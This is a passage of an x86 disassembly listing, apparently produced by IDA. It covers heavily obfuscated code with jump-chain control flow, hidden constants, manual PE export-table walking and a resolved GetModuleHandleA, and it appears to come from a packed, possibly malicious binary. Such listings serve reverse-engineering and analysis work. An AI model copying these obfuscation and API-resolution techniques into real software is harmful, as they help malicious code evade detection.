; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_425125: ; CODE XREF: sub_42AFFE:loc_4236F4�j
jmp loc_42436E
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_42512A proc near ; DATA XREF: sub_425522+3AD4�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423077 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004235A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042744B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428241 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00428391 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B280 SIZE 00000014 BYTES
mov [esi], eax
xchg edi, [esp+0]
mov esi, edi
pop edi
jmp loc_4235A3
sub_42512A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Ah
dd 368CE8B9h, 0B1238B1Bh, 7092008Dh ; DATA XREF: sub_42DBF7+1E27�o
dword_425144 dd 7C900000h ; sub_42DBF7:loc_42AB6C�r
; ---------------------------------------------------------------------------
loc_425148: ; CODE XREF: _7hdaygc1:00423C75�j
; _7hdaygc1:00424D54�j
jmp locret_426DB8
; ---------------------------------------------------------------------------
db 0A4h, 0D1h, 0D2h
dword_425150 dd 0 ; sub_429766:loc_428926�r ...
dword_425154 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; _7hdaygc1:loc_425BE8�w ...
dword_425158 dd 27C80244h ; sub_42B32F+C�r ...
dword_42515C dd 0 ; sub_424494-145�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAF7
loc_425160: ; CODE XREF: sub_42DAF7+C�j
jmp loc_427336
; END OF FUNCTION CHUNK FOR sub_42DAF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_425165: ; CODE XREF: sub_425A37+19�j
jmp loc_42625B
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42516A: ; CODE XREF: sub_4270E6:loc_42D06C�j
pop ebx
sub ebx, 0EA2D37AAh
js loc_425C7C
cmp esi, 0B0D98D64h
jmp loc_42C310
; END OF FUNCTION CHUNK FOR sub_4270E6
; =============== S U B R O U T I N E =======================================
sub_425182 proc near ; CODE XREF: _7hdaygc1:0042354B�j
; sub_429532-1143�p
; FUNCTION CHUNK AT 004236CF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004236DB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426747 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004289EF SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
mov al, [eax]
and al, 0F6h
jmp loc_426747
sub_425182 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add edi, 0A6FC92C5h
jmp loc_4268BB
; ---------------------------------------------------------------------------
and edi, 0F2735484h
jmp sub_42F554
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_4251A5: ; CODE XREF: sub_428B5B:loc_426E56�j
popf
sub eax, 40B6EA58h
mov [ecx], eax
jmp loc_4244AA
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_4251B3: ; CODE XREF: sub_42E076:loc_427874�j
jz loc_4253C1
jmp loc_42E8B8
; END OF FUNCTION CHUNK FOR sub_42E076
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_4251BE: ; CODE XREF: sub_42FD11-A77B�j
; _7hdaygc1:0042637B�j
call sub_42D471
push eax
call sub_42821A
; END OF FUNCTION CHUNK FOR sub_42FD11
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_4251C9: ; CODE XREF: sub_42EF91-A20C�j
xor eax, [ebp-8]
push eax
push ecx
push 82001D39h
pop ecx
and ecx, 4033437Ah
sub ecx, 5121EBE2h
rol ecx, 3
loc_4251E3: ; CODE XREF: _7hdaygc1:0042F16C�j
jmp loc_426F7D
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_4251E8: ; CODE XREF: sub_42A4F1-AF7�j
shr ecx, 9
jmp loc_424ED3
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB0F
loc_4251F0: ; CODE XREF: sub_42AB0F+13�j
sub esi, 0C51C20B2h
or esi, 0FA05C446h
xor esi, ds:4000F7h
push offset loc_42E6B7
jmp loc_42F5C2
; END OF FUNCTION CHUNK FOR sub_42AB0F
; ---------------------------------------------------------------------------
loc_42520C: ; CODE XREF: _7hdaygc1:0042C691�j
pop edx
push 36618ED4h
pop eax
add eax, 476ADB4h
jmp loc_42BE99
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_42521E: ; CODE XREF: sub_4269CB+A�j
jz loc_42617A
jmp loc_424BE1
; END OF FUNCTION CHUNK FOR sub_4269CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_425229: ; CODE XREF: sub_427EF6+C�j
xchg edx, [esp+0]
call sub_42B470
test eax, eax
jz loc_423C59
jmp loc_42471B
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
cdq
jmp sub_42D84A
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_425245: ; CODE XREF: _7hdaygc1:0042FA09�j
jmp sub_42A94C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42524A: ; CODE XREF: sub_424963+BF9�j
jmp loc_429BA0
; END OF FUNCTION CHUNK FOR sub_424963
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42524F proc near ; DATA XREF: _5qvhby1c:0043A645�o
; FUNCTION CHUNK AT 004236D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425BF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426952 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004273B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042907C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A438 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B431 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B64B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF4C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D66E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042EFD5 SIZE 0000000E BYTES
push ebp
mov ebp, esp
push ecx
jns loc_42D66E
jmp loc_42B64B
sub_42524F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42525E proc near ; CODE XREF: _7hdaygc1:00426718�j
; sub_42EF91-7157�p
; FUNCTION CHUNK AT 00423DA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B9F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D0B0 SIZE 00000008 BYTES
xchg edx, [esp+0]
pop edx
jnz loc_42D0B0
mov eax, [ebp-20h]
mov byte ptr [eax], 64h
inc dword ptr [ebp-20h]
loc_425271: ; CODE XREF: _7hdaygc1:00423112�j
mov eax, [ebp-20h]
jmp loc_428B9F
sub_42525E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425279: ; CODE XREF: _7hdaygc1:0042BD40�j
jnz loc_4260C8
; START OF FUNCTION CHUNK FOR sub_42EF3C
loc_42527F: ; CODE XREF: sub_42EF3C+12�j
jmp loc_42DE5C
; END OF FUNCTION CHUNK FOR sub_42EF3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_425284: ; CODE XREF: sub_4273CA+64BB�j
jmp loc_42D52B
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD5
loc_425289: ; CODE XREF: sub_42BAD5+D�j
jmp loc_425FDC
; END OF FUNCTION CHUNK FOR sub_42BAD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42528E: ; CODE XREF: sub_42E283-39A2�j
jmp loc_42E0B9
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
test ebx, eax
jmp loc_42D5CD
; ---------------------------------------------------------------------------
loc_42529A: ; DATA XREF: sub_42C209:loc_42FD07�o
cmp dword ptr [ebp-8], 0
jz loc_428DCA
jmp loc_4239FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_4252A9: ; CODE XREF: sub_42A2EF-460D�j
; _7hdaygc1:0042AECE�j
add ecx, 27999E68h
mov ecx, [ecx]
call sub_42A94C
mov edx, [ebp-4]
lea eax, [ebp-18h]
jmp loc_4248DA
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_4252C1: ; CODE XREF: _7hdaygc1:0042831C�j
test esi, eax
jmp loc_4259D2
; =============== S U B R O U T I N E =======================================
sub_4252C8 proc near ; CODE XREF: _7hdaygc1:00424895�j
; sub_42F05E:loc_4273BD�p
; FUNCTION CHUNK AT 00425BC1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A88D SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
shl eax, 3
mov edx, [ebp+8]
jmp loc_425BC1
sub_4252C8 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4252D8: ; CODE XREF: _7hdaygc1:0042E2DC�j
jmp locret_429B9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBC8
loc_4252DD: ; CODE XREF: sub_42EBC8-A5E5�j
jmp loc_4245A6
; END OF FUNCTION CHUNK FOR sub_42EBC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429FC3
loc_4252E2: ; CODE XREF: sub_429FC3-3974�j
mov [ebp-4], eax
; END OF FUNCTION CHUNK FOR sub_429FC3
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_4252E5: ; CODE XREF: sub_4273CA-1D18�j
; sub_429FC3-3986�j ...
mov eax, [ebp-1Ch]
call sub_4237DA
mov [ebp-8], eax
jmp loc_423AC0
; END OF FUNCTION CHUNK FOR sub_4273CA
; =============== S U B R O U T I N E =======================================
sub_4252F5 proc near ; CODE XREF: sub_429FC3-3979�p
; sub_4273CA+540B�p ...
; FUNCTION CHUNK AT 00429D54 SIZE 00000012 BYTES
call sub_423CAC
loc_4252FA: ; CODE XREF: sub_424AE1+438B�j
jmp loc_429D54
sub_4252F5 endp
; ---------------------------------------------------------------------------
loc_4252FF: ; CODE XREF: _7hdaygc1:loc_42DACF�j
and eax, 431D370Fh
xor eax, 5FC30F9h
add eax, ebp
add eax, 0F90ACDE5h
mov eax, [eax]
push eax
push edi
jmp loc_42DAC5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_42531C: ; CODE XREF: sub_42E254:loc_42EE2C�j
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-7], 10h
jz loc_42806D
inc dword ptr [ebp-8]
loc_42532F: ; CODE XREF: sub_429098:loc_424DA1�j
; sub_429098:loc_42A038�j
mov eax, [ebp-8]
pop ecx
pop ecx
jmp loc_427E2C
; END OF FUNCTION CHUNK FOR sub_42E254
; =============== S U B R O U T I N E =======================================
sub_425339 proc near ; DATA XREF: _7hdaygc1:loc_424870�o
; FUNCTION CHUNK AT 004242B6 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 00429401 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042DE46 SIZE 00000005 BYTES
jb loc_429401
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_42DDE3
mov ecx, [ebx+ecx+0Ch]
jmp loc_425725
sub_425339 endp
; ---------------------------------------------------------------------------
loc_42535A: ; CODE XREF: _7hdaygc1:0042E392�j
jl loc_42BBB2
; =============== S U B R O U T I N E =======================================
sub_425360 proc near ; CODE XREF: _7hdaygc1:004297D4�p
; FUNCTION CHUNK AT 00429FF8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042A46E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B5F7 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
push 0D7489450h
pop ebx
jmp loc_42A46E
sub_425360 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
pop edx
xor edx, [ebp-0Ch]
add edx, 2
jmp loc_42A24D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427455
loc_42537C: ; CODE XREF: sub_427455:loc_42670C�j
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
; END OF FUNCTION CHUNK FOR sub_427455
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_425388: ; CODE XREF: sub_4273CA:loc_42A64E�j
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
jmp loc_42D875
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
and edx, esi
jmp loc_4232C1
; =============== S U B R O U T I N E =======================================
sub_4253A0 proc near ; CODE XREF: _7hdaygc1:0042BCF1�j
; sub_42C763:loc_42C696�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004237C9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004237F0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423924 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424BD5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424DFB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004261DE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004268F1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426BEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042721D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428F3D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042935C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A599 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042AEA7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042BC68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D22D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DD4A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DE39 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042DF52 SIZE 0000000E BYTES
xchg eax, [esp+0]
pop eax
cmp dword ptr [ebp-4], 0
loc_4253A8: ; CODE XREF: _7hdaygc1:00427261�j
jz loc_4237F0
jmp loc_42935C
sub_4253A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
rol ebp, 1Bh
xor eax, 0E49F8286h
jmp sub_428B02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_4253C1: ; CODE XREF: sub_42E076:loc_4251B3�j
; sub_42E076-35A�j
add dword ptr [ebp-4], 4
call sub_42C6FB
loc_4253CA: ; CODE XREF: _7hdaygc1:0042EC37�j
; _7hdaygc1:loc_42FDAF�j
call sub_428C3B
loc_4253CF: ; CODE XREF: _7hdaygc1:loc_42B4D5�j
add eax, [ebp-0Ch]
push esi
mov esi, edi
push offset loc_42A97B
jmp loc_42E779
; END OF FUNCTION CHUNK FOR sub_42E076
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_4253E0: ; CODE XREF: sub_424AE1+5442�j
jmp loc_42E939
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F621
loc_4253E5: ; CODE XREF: sub_42F621-9FE2�j
jmp loc_424799
; END OF FUNCTION CHUNK FOR sub_42F621
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_4253EA: ; CODE XREF: sub_4246D7+707�j
jmp nullsub_134
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
sub ecx, 0DE2D1E66h
jmp sub_425C2C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDF5
loc_4253FB: ; CODE XREF: sub_42DDF5+22�j
jmp loc_427105
; END OF FUNCTION CHUNK FOR sub_42DDF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F528
loc_425400: ; CODE XREF: sub_42F528-204C�j
rol edx, 1Fh
add edx, 0BFEEBC93h
xchg edx, [esp+0]
jmp loc_4239CA
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_425411: ; CODE XREF: sub_42AA9B:loc_42CEF1�j
and ecx, 322072AEh
xor ecx, 0EF1F0174h
jnz loc_42D7AF
; END OF FUNCTION CHUNK FOR sub_42AA9B
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_425423: ; CODE XREF: sub_42AA07-4CF�j
jmp loc_427149
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
jnz loc_42B647
rol edx, 4
jmp loc_42D7AA
; ---------------------------------------------------------------------------
xor ebp, 85A12B60h
jmp loc_42F465
; ---------------------------------------------------------------------------
loc_425441: ; DATA XREF: _7hdaygc1:00428AD1�o
mov esp, ebp
xchg ecx, [esp]
mov ebp, ecx
pop ecx
mov eax, ds:dword_42B97C
push offset sub_42A92E
jmp loc_42F9A0
; =============== S U B R O U T I N E =======================================
sub_425459 proc near ; CODE XREF: _7hdaygc1:00429D4F�j
; sub_428613+3B36�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042363D SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add ebx, 91ADEE2Ch
popf
xchg ebx, [esp-8+arg_4]
jmp loc_42363D
sub_425459 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42546C: ; CODE XREF: _7hdaygc1:00428493�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42546D: ; CODE XREF: sub_424AE1+66BD�j
jmp loc_42A162
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291CE
loc_425472: ; CODE XREF: sub_4291CE-3724�j
jmp loc_42DB10
; END OF FUNCTION CHUNK FOR sub_4291CE
; ---------------------------------------------------------------------------
or esi, ebp
jmp loc_42FAB6
; ---------------------------------------------------------------------------
push edx
xchg eax, [ecx]
jmp sub_42F9D2
; ---------------------------------------------------------------------------
loc_425486: ; DATA XREF: _7hdaygc1:0042C8E6�o
cmp ds:dword_42B9B8, 0
jmp loc_4273C2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425492 proc near ; CODE XREF: sub_42948A+4�j
; FUNCTION CHUNK AT 00423D9E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00423E70 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042709B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00429669 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429EAB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A282 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AE74 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
jmp loc_42709B
sub_425492 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42549D: ; CODE XREF: _7hdaygc1:0042CCBB�j
not eax
cmp ebx, 5BD84B22h
jmp loc_42E61C
; ---------------------------------------------------------------------------
loc_4254AA: ; CODE XREF: _7hdaygc1:0042C5E6�j
jge loc_42BE4B
shl ecx, 1Dh
jg loc_4267F1
jmp loc_4285AC
; =============== S U B R O U T I N E =======================================
sub_4254BE proc near ; CODE XREF: _7hdaygc1:00428525�j
; sub_42826A+1433�p
; FUNCTION CHUNK AT 00428108 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042CA23 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
add edx, [ebp-4]
add eax, edx
jmp loc_42CA23
sub_4254BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_4254CC: ; CODE XREF: sub_425F27:loc_42EA39�j
; _7hdaygc1:0042EA4C�j
add edx, 0D3D24C55h
xchg edx, [esp+0]
jmp loc_42CD8F
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4254DA: ; CODE XREF: sub_4291EA+BF2�j
jp loc_42B60F
pushf
jmp loc_42C2C6
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_4254E6: ; CODE XREF: sub_429318-62B7�j
jbe loc_42C0FB
push ebp
loc_4254ED: ; CODE XREF: sub_42821A:loc_423804�j
cmp dword ptr [ebp-8], 103h
jz loc_42E49F
jmp loc_424633
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B0DC
loc_4254FF: ; CODE XREF: sub_42B0DC+F�j
call sub_42A052
loc_425504: ; DATA XREF: sub_4291EA+30F1�o
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
ror eax, 16h
mov ds:dword_42E1B4, eax
retn
; END OF FUNCTION CHUNK FOR sub_42B0DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AF7
loc_425514: ; CODE XREF: sub_428AF7+6�j
jmp loc_428D7A
; END OF FUNCTION CHUNK FOR sub_428AF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_425519: ; CODE XREF: sub_4291EA-1F37�j
rol eax, 16h
push eax
jmp loc_42C164
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425522 proc near ; CODE XREF: sub_42AA07:loc_42B625�j
; FUNCTION CHUNK AT 00423252 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00425851 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FE8 SIZE 00000018 BYTES
push ebp
mov ebp, esp
push ecx
push esi
jmp loc_423252
sub_425522 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42552C: ; CODE XREF: sub_42C7F3+1552�j
popf
loc_42552D: ; CODE XREF: sub_42C7F3:loc_42DD3D�j
add edx, 9AD1C19Ah
sub edx, 0E86DEB78h
jnz loc_426C51
add ecx, ebp
jmp loc_42C2AB
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_425546: ; CODE XREF: sub_424963+832C�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_4237DA
cmp eax, [ebp-8]
jnz loc_42D0B8
jmp loc_42524A
; END OF FUNCTION CHUNK FOR sub_424963
; =============== S U B R O U T I N E =======================================
sub_425561 proc near ; DATA XREF: _7hdaygc1:0042668C�o
; FUNCTION CHUNK AT 00423A41 SIZE 0000001A BYTES
push esi
push 6B0FEA83h
pop esi
and esi, 9C396E2Bh
jmp loc_423A41
sub_425561 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_425573: ; CODE XREF: sub_42FD11-8C0�j
and eax, 6D99858Ch
xor eax, 0FCB6D440h
and eax, 0E9FE9EDAh
xor eax, 6790ECAFh
add eax, ebp
add eax, 31C98789h
push eax
xor eax, eax
jmp loc_4251BE
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
loc_42559B: ; CODE XREF: _7hdaygc1:00428CFE�j
add edx, ebp
add edx, 0B792B6AAh
mov edx, [edx]
lea eax, [ebp-18h]
mov ecx, [ebp-30h]
jmp loc_428878
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_4255B0: ; CODE XREF: sub_425A37:loc_428B4A�j
jnz loc_42CBA7
or ebp, 5CB1347Ch
shr esi, 1
rol ecx, 19h
cmp edi, 85D42B5Fh
jmp loc_42CB9B
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4255CC: ; CODE XREF: sub_42AFFE-6E36�j
xchg eax, [esp+8+var_8]
jmp loc_42E7C1
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_4255D4: ; CODE XREF: sub_42E283:loc_42B872�j
xchg ebx, [esp+0]
push offset loc_42C245
jmp nullsub_84
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_4255E1: ; CODE XREF: sub_42616B+42B7�j
or edi, 0C624BDD6h
jp nullsub_179
; END OF FUNCTION CHUNK FOR sub_42616B
; START OF FUNCTION CHUNK FOR sub_425F27
loc_4255ED: ; CODE XREF: sub_425F27+44B6�j
pop esi
jmp sub_424359
; END OF FUNCTION CHUNK FOR sub_425F27
; =============== S U B R O U T I N E =======================================
sub_4255F3 proc near ; DATA XREF: sub_426471:loc_4250D1�o
or eax, eax
jnz loc_4280F2
jmp loc_425E53
sub_4255F3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE7D
loc_425600: ; CODE XREF: sub_42BE7D+17�j
call sub_42409E
loc_425605: ; DATA XREF: sub_4273E3+7�o
test byte ptr [eax-8], 8
setnz al
call sub_42A3F7
pop ecx
mov edx, [ebp+8]
imul dword ptr [edx-4]
jmp loc_42E8BE
; END OF FUNCTION CHUNK FOR sub_42BE7D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_42561E: ; CODE XREF: _7hdaygc1:loc_42C47C�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F621
loc_42561F: ; CODE XREF: sub_42F621+1C�j
add eax, 7AF98770h
sub eax, 6F0E0001h
or eax, 46E4AED3h
sub eax, 21C0EE84h
xor eax, 8809C341h
add eax, ebp
jmp loc_4253E5
; END OF FUNCTION CHUNK FOR sub_42F621
; ---------------------------------------------------------------------------
loc_425644: ; CODE XREF: _7hdaygc1:004293DA�j
ror ecx, 9
; =============== S U B R O U T I N E =======================================
sub_425647 proc near ; CODE XREF: sub_42B3AD+1�p
; FUNCTION CHUNK AT 00423584 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E5E0 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42E5E0
sub_425647 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 31h
dd 0E8000001h, 6, 804DE9h, 2268C300h, 0E9004255h, 62CDh
; =============== S U B R O U T I N E =======================================
sub_425670 proc near ; CODE XREF: _7hdaygc1:00424B1D�j
; sub_42AFFE+C1E�p
xchg ebx, [esp+0]
loc_425673: ; CODE XREF: sub_42A92E+1B88�j
pop ebx
mov ds:dword_42515C, eax
jmp loc_427227
sub_425670 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42567E proc near ; CODE XREF: sub_423CAC+4�j
var_3C = dword ptr -3Ch
; FUNCTION CHUNK AT 004248CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424946 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428154 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042AD69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C4A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D8FC SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042DA52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E370 SIZE 0000001C BYTES
push ebp
mov ebp, esp
jmp loc_42AD69
sub_42567E endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_425687: ; CODE XREF: sub_42C443-4F8�j
jmp loc_42CF6F
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42568C: ; CODE XREF: sub_425F27-29E9�j
jmp loc_42E4CA
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D30E
loc_425691: ; CODE XREF: sub_42D30E+14�j
xchg edi, [esp+0]
push 4DC11311h
pop eax
sub eax, 3CEA6921h
jmp loc_42CA1E
; END OF FUNCTION CHUNK FOR sub_42D30E
